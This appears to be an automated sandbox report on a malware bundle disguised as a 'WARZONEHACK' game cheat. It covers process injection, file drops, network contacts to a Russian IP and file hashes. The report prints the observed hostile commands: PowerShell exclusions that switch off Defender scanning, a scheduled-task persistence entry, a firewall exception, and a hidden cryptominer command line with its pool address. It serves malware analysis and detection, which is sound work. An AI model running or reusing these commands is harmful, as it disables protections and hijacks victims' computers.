File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1412 set thread context of 1452 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe

Enumerates physical storage devices

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\system32\WerFault.exe C:\Windows\System32\svchost.exe

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\Insidious2.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\server.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1968 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 1968 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 1968 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 1968 wrote to memory of 1168 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\KLNR.exe
PID 1968 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe
PID 1968 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe
PID 1968 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe
PID 1968 wrote to memory of 1060 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe
PID 1968 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
PID 1968 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
PID 1968 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
PID 1968 wrote to memory of 1288 N/A C:\Users\Admin\AppData\Local\Temp\65119209.exe C:\Users\Admin\AppData\Local\Temp\Insidious2.exe
PID 1060 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe C:\Windows\System32\conhost.exe
PID 1060 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe C:\Windows\System32\conhost.exe
PID 1060 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe C:\Windows\System32\conhost.exe
PID 1060 wrote to memory of 580 N/A C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe C:\Windows\System32\conhost.exe
PID 580 wrote to memory of 1624 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 580 wrote to memory of 1624 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 580 wrote to memory of 1624 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1624 wrote to memory of 2004 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 2004 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 2004 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 580 wrote to memory of 1416 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 580 wrote to memory of 1416 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 580 wrote to memory of 1416 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1416 wrote to memory of 1920 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1416 wrote to memory of 1920 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1416 wrote to memory of 1920 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\schtasks.exe
PID 1168 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 1168 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 1168 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 1168 wrote to memory of 1668 N/A C:\Users\Admin\AppData\Local\Temp\KLNR.exe C:\Users\Admin\AppData\Local\Temp\server.exe
PID 1624 wrote to memory of 1612 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 1612 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1624 wrote to memory of 1612 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 580 wrote to memory of 1072 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 580 wrote to memory of 1072 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 580 wrote to memory of 1072 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1072 wrote to memory of 392 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\services64.exe
PID 1072 wrote to memory of 392 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\services64.exe
PID 1072 wrote to memory of 392 N/A C:\Windows\System32\cmd.exe C:\Windows\system32\services64.exe
PID 1668 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 1668 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 1668 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 1668 wrote to memory of 1296 N/A C:\Users\Admin\AppData\Local\Temp\server.exe C:\Windows\SysWOW64\netsh.exe
PID 392 wrote to memory of 1412 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 392 wrote to memory of 1412 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 392 wrote to memory of 1412 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 392 wrote to memory of 1412 N/A C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe
PID 1412 wrote to memory of 1092 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1412 wrote to memory of 1092 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1412 wrote to memory of 1092 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\cmd.exe
PID 1092 wrote to memory of 960 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 960 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 960 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1412 wrote to memory of 1892 N/A C:\Windows\System32\conhost.exe C:\Windows\system32\Microsoft\Libs\sihost64.exe
PID 1412 wrote to memory of 1892 N/A C:\Windows\System32\conhost.exe C:\Windows\system32\Microsoft\Libs\sihost64.exe
PID 1412 wrote to memory of 1892 N/A C:\Windows\System32\conhost.exe C:\Windows\system32\Microsoft\Libs\sihost64.exe
PID 1092 wrote to memory of 1616 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 1616 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1092 wrote to memory of 1616 N/A C:\Windows\System32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1412 wrote to memory of 1452 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 1412 wrote to memory of 1452 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe
PID 1412 wrote to memory of 1452 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\svchost.exe

Processes

C:\Users\Admin\AppData\Local\Temp\65119209.exe

"C:\Users\Admin\AppData\Local\Temp\65119209.exe"

C:\Users\Admin\AppData\Local\Temp\KLNR.exe

"C:\Users\Admin\AppData\Local\Temp\KLNR.exe"

C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe

"C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe"

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

"C:\Users\Admin\AppData\Local\Temp\Insidious2.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\System32\cmd.exe

"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Windows\system32\schtasks.exe

schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"

C:\Users\Admin\AppData\Local\Temp\server.exe

"C:\Users\Admin\AppData\Local\Temp\server.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\cmd.exe

"cmd" cmd /c "C:\Windows\system32\services64.exe"

C:\Windows\system32\services64.exe

C:\Windows\system32\services64.exe

C:\Windows\SysWOW64\netsh.exe

netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\server.exe" "server.exe" ENABLE

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"

C:\Windows\System32\cmd.exe

"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Windows\system32\Microsoft\Libs\sihost64.exe

"C:\Windows\system32\Microsoft\Libs\sihost64.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\System32\svchost.exe

C:\Windows/System32\svchost.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6238470 --pass=WarzoneHACK --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=80 --cinit-stealth

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "/sihost64"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 1452 -s 124

Network

Country Destination Domain Proto
US 8.8.8.8:53 freegeoip.app udp
US 188.114.96.0:443 freegeoip.app tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp
RU 82.202.167.67:7790 tcp

Files

memory/1968-54-0x0000000000400000-0x000000000093C000-memory.dmp

memory/1968-55-0x0000000075C31000-0x0000000075C33000-memory.dmp

\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

C:\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

\Users\Admin\AppData\Local\Temp\KLNR.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe

MD5 e066cd70ab7e9dc95320051773a5d8a9
SHA1 51692557ac7c4e99065c320557c341229481cfe4
SHA256 22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e
SHA512 b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe

MD5 e066cd70ab7e9dc95320051773a5d8a9
SHA1 51692557ac7c4e99065c320557c341229481cfe4
SHA256 22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e
SHA512 b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5 198458bfe3e5de2eb6737beb2d54c292
SHA1 59785684874f6b45205db1f96268593c97485dfe
SHA256 d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
SHA512 7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5 198458bfe3e5de2eb6737beb2d54c292
SHA1 59785684874f6b45205db1f96268593c97485dfe
SHA256 d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
SHA512 7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

C:\Users\Admin\AppData\Local\Temp\Insidious2.exe

MD5 198458bfe3e5de2eb6737beb2d54c292
SHA1 59785684874f6b45205db1f96268593c97485dfe
SHA256 d8657c28223f4e125ba12b4cc56dac08f48e5ef24c7e295f640f281ae456bfca
SHA512 7b10151a06424279cd676f78a61fb0245241fe795b2adb6a930bd331686d4a7843f0abd101c339a3f2c2ec341182b19f47f8e8ab1aaa41338a30d03ecbea5842

\??\c:\users\admin\appdata\local\temp\klnr.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

memory/580-66-0x0000000000110000-0x0000000000331000-memory.dmp

memory/1288-67-0x000007FEF4EC0000-0x000007FEF58AC000-memory.dmp

memory/580-68-0x000007FEF4EC0000-0x000007FEF58AC000-memory.dmp

memory/1168-69-0x0000000073E30000-0x00000000743DB000-memory.dmp

memory/1168-70-0x00000000024E0000-0x00000000024E1000-memory.dmp

memory/1168-71-0x0000000073E30000-0x00000000743DB000-memory.dmp

memory/1288-72-0x00000000001A0000-0x00000000001EA000-memory.dmp

memory/580-73-0x000000001B202000-0x000000001B204000-memory.dmp

memory/580-74-0x000000001B4A0000-0x000000001B6C0000-memory.dmp

memory/580-76-0x000000001B206000-0x000000001B207000-memory.dmp

memory/580-75-0x000000001B204000-0x000000001B206000-memory.dmp

memory/1288-77-0x000000001B150000-0x000000001B152000-memory.dmp

memory/580-78-0x000000001B207000-0x000000001B208000-memory.dmp

memory/2004-79-0x000007FEFB711000-0x000007FEFB713000-memory.dmp

memory/2004-82-0x00000000028F0000-0x00000000028F2000-memory.dmp

memory/2004-81-0x000007FEEECC0000-0x000007FEEF65D000-memory.dmp

memory/2004-83-0x00000000028F2000-0x00000000028F4000-memory.dmp

memory/2004-84-0x00000000028F4000-0x00000000028F7000-memory.dmp

memory/2004-80-0x000007FEEC1A0000-0x000007FEECCFD000-memory.dmp

memory/2004-85-0x000000001B7E0000-0x000000001BADF000-memory.dmp

memory/2004-86-0x00000000028FB000-0x000000000291A000-memory.dmp

\Users\Admin\AppData\Local\Temp\server.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

\Users\Admin\AppData\Local\Temp\server.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

C:\Users\Admin\AppData\Local\Temp\server.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

\??\c:\users\admin\appdata\local\temp\server.exe

MD5 8563f76405eb62c0e2a62f57992cb413
SHA1 5f7ff11c5f7be4c15fe6a256f4712e6f98dbd918
SHA256 a9021056e13fa4900943cab8c13718e9b82a55c6605624acc89539d5f7446838
SHA512 e9ba6c5b44eb679bac303dcefb47196cc606a235269da7f58fa352f1b28c3edd6190311a8d79391d81bb71264f55650334edfb78f05a7bdaeee2b220b868b823

C:\Users\Admin\AppData\Local\Temp\WARZONEHACK.exe

MD5 e066cd70ab7e9dc95320051773a5d8a9
SHA1 51692557ac7c4e99065c320557c341229481cfe4
SHA256 22be3ee1348830dcc0e1e86347422b9ab0ae5ce0523bf6f312566051a163d79e
SHA512 b0fa1a69780f2549af4aa91ec04377ec32ccb80481b1e63e3a99179d2b55d96704a45142b3a3fd374b3aba2f279fd1d5f60d5242e14b07d1f6494e4816525cdb

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

MD5 9542f730ec96bfcc506231c591780fbe
SHA1 f5beaeb8184a656d2933ff5e3bc48f44c81e943b
SHA256 1c75467f811d6ffb15d00100a3b88f45ba39e7dc076494267d3e0acb0e37e64e
